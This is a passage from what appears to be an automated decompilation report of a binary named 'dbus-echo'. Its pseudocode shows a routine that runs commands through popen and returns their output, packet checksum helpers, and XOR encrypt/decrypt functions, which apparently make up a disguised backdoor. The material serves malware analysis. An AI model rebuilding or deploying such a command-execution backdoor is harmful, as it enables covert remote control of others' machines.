    rcx = 0xffffffffffffffff;
    *((rbp - 0x38)) = rax;
    eax = 0;
    rdi = *((rbp - 0x38));
    __asm ("repne scasb al, byte [rdi]");
    rax = rcx;
    rax = ~rax;
    rax--;
    *((rbp - 4)) = ax;
    eax = 0;
    rax = popen (*((rbp - 0x18)), 0x40194d);
    rax = (int64_t) eax;
    *((rbp - 0x10)) = rax;
    if (*((rbp - 0x10)) != 0) {
        goto label_0;
    }
    perror (*((rbp - 0x18)));
    eax = 0;
    pclose (*((rbp - 0x10)));
    eax = *((rbp - 4));
    rdi += *((rbp - 0x20));
    eax = 0;
    sprintf (rax, "server error: '%s' cannt execute\n", *((rbp - 0x18)));
    rax = *((rbp - 0x20));
    rcx = 0xffffffffffffffff;
    *((rbp - 0x40)) = rax;
    eax = 0;
    rdi = *((rbp - 0x40));
    __asm ("repne scasb al, byte [rdi]");
    rax = rcx;
    rax = ~rax;
    rax--;
    eax = (int32_t) ax;
    *((rbp - 0x24)) = eax;
    goto label_1;
    do {
        al = fgetc (*((rbp - 0x10)));
        *((rbp - 1)) = al;
        if (*((rbp - 1)) == 0xff) {
            goto label_2;
        }
        eax = *((rbp - 4));
        rdx = rax;
        rdx += *((rbp - 0x20));
        eax = *((rbp - 1));
        *(rdx) = al;
        *((rbp - 4))++;
label_0:
    } while (*((rbp - 4)) <= 0x4af);
label_2:
    eax = 0;
    pclose (*((rbp - 0x10)));
    eax = *((rbp - 4));
    *((rbp - 0x24)) = eax;
label_1:
    eax = *((rbp - 0x24));
    return rax;
}

--- sym.udp_tcp_checksum ---
/* r2dec pseudo code output (r2 6.0.8) */
/* /data/shared/dbus-echo @ 0x4016b8 */
#include <stdint.h>
 
uint64_t udp_tcp_checksum (int64_t arg1, int64_t arg2, int64_t arg3, int64_t arg4) {
    int64_t var_61ch;
    int64_t var_618h;
    int64_t var_60ch;
    int64_t var_608h;
    int64_t var_604h;
    void  s;
    int64_t var_20h;
    int64_t var_1ch;
    int64_t var_18h;
    int64_t var_17h;
    int64_t var_16h;
    size_t n;
    int64_t var_4h;
    rsi = arg1;
    rdx = arg2;
    rcx = arg3;
    r8 = arg4;
    *((rbp - 0x608)) = esi;
    *((rbp - 0x60c)) = edx;
    *((rbp - 0x618)) = rcx;
    eax = r8d;
    *((rbp - 0x604)) = dil;
    *((rbp - 0x61c)) = ax;
    *((rbp - 6)) = 0xc;
    eax = *((rbp - 0x60c));
    *((rbp - 0x20)) = eax;
    eax = *((rbp - 0x608));
    *((rbp - 0x1c)) = eax;
    *((rbp - 0x18)) = 0;
    eax = *((rbp - 0x604));
    *((rbp - 0x17)) = al;
    edi = *((rbp - 0x61c));
    ax = htons ();
    *((rbp - 0x16)) = ax;
    edx = *((rbp - 6));
    eax = *((rbp - 0x61c));
    eax = rdx + rax;
    *((rbp - 4)) = eax;
    memset (rbp - 0x600, 0, 0x5dc);
    ecx = *((rbp - 6));
    rax = rbp - 0x600;
    rdx = rbp - 0x20;
    rdi = rax;
    rsi = rdx;
    do {
        *(rdi) = *(rsi);
        rcx--;
        rsi++;
        rdi++;
    } while (rcx != 0);
    ecx = *((rbp - 0x61c));
    eax = *((rbp - 6));
    rdx = rax;
    rax = rbp - 0x600;
    rax += rdx;
    rdx = *((rbp - 0x618));
    rdi = rax;
    rsi = rdx;
    *(rdi) = *(rsi);
    rcx--;
    rsi++;
    rdi++;
    rdi = rbp - 0x600;
    esi = *((rbp - 4));
    ax = checksum ();
    eax = (int32_t) ax;
    return rax;
}

--- sym.__libc_csu_init ---
//WARNING: Removing unreachable block (ram,0x004017fa)
//WARNING: Removing unreachable block (ram,0x00401800)

void sym.__libc_csu_init(ulong arg1,ulong arg2,ulong arg3)

{
    sym._init();
    return;
}

--- sym.checksum ---
uint32_t sym.checksum(uint16_t *arg1,ulong arg2)

{
    int64_t iVar1;
    int var_1ch;
    uint16_t *var_18h;
    uint64_t var_8h;
    
    var_8h = 0;
    var_18h = arg1;
    for (var_1ch = arg2; 1 < var_1ch; var_1ch = var_1ch + -2) {
        var_8h = var_8h + *var_18h;
        var_18h = var_18h + 1;
    }
    if (var_1ch != 0) {
        var_8h = var_8h + *var_18h;
    }
    iVar1 = (var_8h >> 0x10) + (var_8h & 0xffff);
    return ~(iVar1 + (iVar1 >> 0x10)) & 0xffff;
}

--- sym.myDecryptFun ---
//WARNING: Variable defined which should be unmapped: var_5h

uint16_t sym.myDecryptFun(int64_t arg1,ulong noname_1,int64_t arg2,ulong noname_3,int64_t arg3)

{
    uint16_t in_CX;
    uint8_t in_SIL;
    ulong var_38h;
    ulong var_28h;
    ulong var_18h;
    ulong var_5h;
    
    var_5h._0_1_ = 0;
    for (var_5h._1_4_ = 0; var_5h._1_4_ < in_CX; var_5h._1_4_ = var_5h._1_4_ + 1) {
        if (in_SIL <= var_5h) {
            var_5h._0_1_ = 0;
        }
        *(var_5h._1_4_ + arg3) = *(var_5h._1_4_ + arg2) ^ *(var_5h + arg1);
        var_5h._0_1_ = var_5h + 1;
    }
    return in_CX;
}

--- sym.myEncryptFun ---
//WARNING: Variable defined which should be unmapped: var_5h

uint16_t sym.myEncryptFun(int64_t arg1,ulong noname_1,int64_t arg2,ulong noname_3,int64_t arg3)

{
    uint16_t in_CX;
    uint8_t in_SIL;
    ulong var_38h;
    ulong var_28h;
    ulong var_18h;
    ulong var_5h;
    
    var_5h._0_1_ = 0;
    for (var_5h._1_4_ = 0; var_5h._1_4_ < in_CX; var_5h._1_4_ = var_5h._1_4_ + 1) {
        if (in_SIL <= var_5h) {
            var_5h._0_1_ = 0;
        }
        *(var_5h._1_4_ + arg3) = *(var_5h._1_4_ + arg2) ^ *(var_5h + arg1);
        var_5h._0_1_ = var_5h + 1;
    }
    return in_CX;
}

--- sym.__do_global_dtors_aux ---
//WARNING: Removing unreachable block (ram,0x00400b21)

void sym.__do_global_dtors_aux(void)

{
    if (obj.completed.6145 == 0x0) {
        obj.completed.6145 = 0x1;
    }
    return;
}

--- sym.__do_global_ctors_aux ---
void sym.__do_global_ctors_aux(void)

{
    code *pcVar1;
    code *pcVar2;
    
    pcVar2 = segment.LOAD1;
    pcVar1 = _segment.LOAD1;
    if (_segment.LOAD1 != 0xffffffffffffffff) {
        do {
            pcVar2 = pcVar2 + -8;
            (*pcVar1)();
            pcVar1 = *pcVar2;
        } while (*pcVar2 != 0xffffffffffffffff);
    }
    return;
}

======================================================================
END OF REPORT
======================================================================